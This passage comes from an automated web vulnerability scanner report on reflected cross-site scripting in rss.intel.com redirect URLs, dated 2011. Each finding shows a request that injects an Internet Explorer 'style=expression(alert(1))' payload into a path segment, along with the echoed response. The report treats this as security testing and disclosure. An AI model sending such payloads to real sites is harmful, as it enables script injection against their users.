User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:04 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093c3d82"style="x:expression(alert(1))"a47bdb4daac
Content-Length: 246
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093c3d82"style="x:expression(alert(1))"a47bdb4daac">
...[SNIP]...

4.73. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf234"style%3d"x%3aexpression(alert(1))"80af0cefb29 was submitted in the REST URL parameter 3. This input was echoed as bf234"style="x:expression(alert(1))"80af0cefb29 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264093/newsroom.intel.combf234"style%3d"x%3aexpression(alert(1))"80af0cefb29/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:09 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.combf234"style="x:expression(alert(1))"80af0cefb29/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business
Content-Length: 221
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.combf234"style="x:expression(alert(1))"80af0cefb29/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business">
...[SNIP]...

4.74. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee58f"style%3d"x%3aexpression(alert(1))"9a29b5a08b9 was submitted in the REST URL parameter 4. This input was echoed as ee58f"style="x:expression(alert(1))"9a29b5a08b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264093/newsroom.intel.com/communityee58f"style%3d"x%3aexpression(alert(1))"9a29b5a08b9/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:14 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/communityee58f"style="x:expression(alert(1))"9a29b5a08b9/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093
Content-Length: 246
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/communityee58f"style="x:expression(alert(1))"9a29b5a08b9/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093">
...[SNIP]...

4.75. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 5]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc484"style%3d"x%3aexpression(alert(1))"f99e89de0d0 was submitted in the REST URL parameter 5. This input was echoed as dc484"style="x:expression(alert(1))"f99e89de0d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroomdc484"style%3d"x%3aexpression(alert(1))"f99e89de0d0/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:20 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroomdc484"style="x:expression(alert(1))"f99e89de0d0/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093
Content-Length: 246
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroomdc484"style="x:expression(alert(1))"f99e89de0d0/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093">
...[SNIP]...

4.76. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 6]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2734c"style%3d"x%3aexpression(alert(1))"dfc1ad19df5 was submitted in the REST URL parameter 6. This input was echoed as 2734c"style="x:expression(alert(1))"dfc1ad19df5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog2734c"style%3d"x%3aexpression(alert(1))"dfc1ad19df5/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:24 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog2734c"style="x:expression(alert(1))"dfc1ad19df5/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093
Content-Length: 246
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog2734c"style="x:expression(alert(1))"dfc1ad19df5/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093">
...[SNIP]...

4.77. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 7]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 858f3"style%3d"x%3aexpression(alert(1))"f39a96aae49 was submitted in the REST URL parameter 7. This input was echoed as 858f3"style="x:expression(alert(1))"f39a96aae49 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011858f3"style%3d"x%3aexpression(alert(1))"f39a96aae49/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:29 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011858f3"style="x:expression(alert(1))"f39a96aae49/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093
Content-Length: 246
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011858f3"style="x:expression(alert(1))"f39a96aae49/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093">
...[SNIP]...

4.78. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 8]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76c51"style%3d"x%3aexpression(alert(1))"f5ad9d5bc7f was submitted in the REST URL parameter 8. This input was echoed as 76c51"style="x:expression(alert(1))"f5ad9d5bc7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51"style%3d"x%3aexpression(alert(1))"f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:34 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51"style="x:expression(alert(1))"f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093
Content-Length: 246
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51"style="x:expression(alert(1))"f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093">
...[SNIP]...

4.79. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 9]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dadd6"style%3d"x%3aexpression(alert(1))"a8ffa0511c5 was submitted in the REST URL parameter 9. This input was echoed as dadd6"style="x:expression(alert(1))"a8ffa0511c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31dadd6"style%3d"x%3aexpression(alert(1))"a8ffa0511c5/intel-completes-acquisition-of-infineon-s-wireless-solutions-business HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:39 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31dadd6"style="x:expression(alert(1))"a8ffa0511c5/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093
Content-Length: 246
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31dadd6"style="x:expression(alert(1))"a8ffa0511c5/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093">
...[SNIP]...

4.80. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 10]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution

Issue detail

The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa91f"style%3d"x%3aexpression(alert(1))"6ea33654632 was submitted in the REST URL parameter 10. This input was echoed as fa91f"style="x:expression(alert(1))"6ea33654632 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solutionfa91f"style%3d"x%3aexpression(alert(1))"6ea33654632 HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:43 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solutionfa91f"style="x:expression(alert(1))"6ea33654632?cid=rss-258152-c1-264102
Content-Length: 236
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solutionfa91f"style="x:expression(alert(1))"6ea33654632?cid=rss-258152-c1-264102">
...[SNIP]...

4.81. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d862"style%3d"x%3aexpression(alert(1))"b65d0f7bf80 was submitted in the REST URL parameter 2. This input was echoed as 6d862"style="x:expression(alert(1))"b65d0f7bf80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-2641026d862"style%3d"x%3aexpression(alert(1))"b65d0f7bf80/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:04 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-2641026d862"style="x:expression(alert(1))"b65d0f7bf80
Content-Length: 236
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-2641026d862"style="x:expression(alert(1))"b65d0f7bf80">
...[SNIP]...

4.82. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7b3c"style%3d"x%3aexpression(alert(1))"5cf453fb1b6 was submitted in the REST URL parameter 3. This input was echoed as e7b3c"style="x:expression(alert(1))"5cf453fb1b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264102/newsroom.intel.come7b3c"style%3d"x%3aexpression(alert(1))"5cf453fb1b6/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:09 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.come7b3c"style="x:expression(alert(1))"5cf453fb1b6/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution
Content-Length: 211
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.come7b3c"style="x:expression(alert(1))"5cf453fb1b6/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution">
...[SNIP]...

4.83. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d32af"style%3d"x%3aexpression(alert(1))"8b71a1cc4e5 was submitted in the REST URL parameter 4. This input was echoed as d32af"style="x:expression(alert(1))"8b71a1cc4e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264102/newsroom.intel.com/communityd32af"style%3d"x%3aexpression(alert(1))"8b71a1cc4e5/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:14 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/communityd32af"style="x:expression(alert(1))"8b71a1cc4e5/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102
Content-Length: 236
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/communityd32af"style="x:expression(alert(1))"8b71a1cc4e5/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102">
...[SNIP]...

4.84. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 5]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb38a"style%3d"x%3aexpression(alert(1))"70a761bace1 was submitted in the REST URL parameter 5. This input was echoed as eb38a"style="x:expression(alert(1))"70a761bace1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroomeb38a"style%3d"x%3aexpression(alert(1))"70a761bace1/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:18 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroomeb38a"style="x:expression(alert(1))"70a761bace1/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102
Content-Length: 236
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroomeb38a"style="x:expression(alert(1))"70a761bace1/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102">
...[SNIP]...

4.85. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 6]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a85ab"style%3d"x%3aexpression(alert(1))"efed0610cc5 was submitted in the REST URL parameter 6. This input was echoed as a85ab"style="x:expression(alert(1))"efed0610cc5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/bloga85ab"style%3d"x%3aexpression(alert(1))"efed0610cc5/2011/01/31/intel-identifies-chipset-design-error-implementing-solution HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:23 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/bloga85ab"style="x:expression(alert(1))"efed0610cc5/2011/01/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102
Content-Length: 236
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/bloga85ab"style="x:expression(alert(1))"efed0610cc5/2011/01/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102">
...[SNIP]...

4.86. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 7]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df855"style%3d"x%3aexpression(alert(1))"2637a52c4aa was submitted in the REST URL parameter 7. This input was echoed as df855"style="x:expression(alert(1))"2637a52c4aa in the application's response.

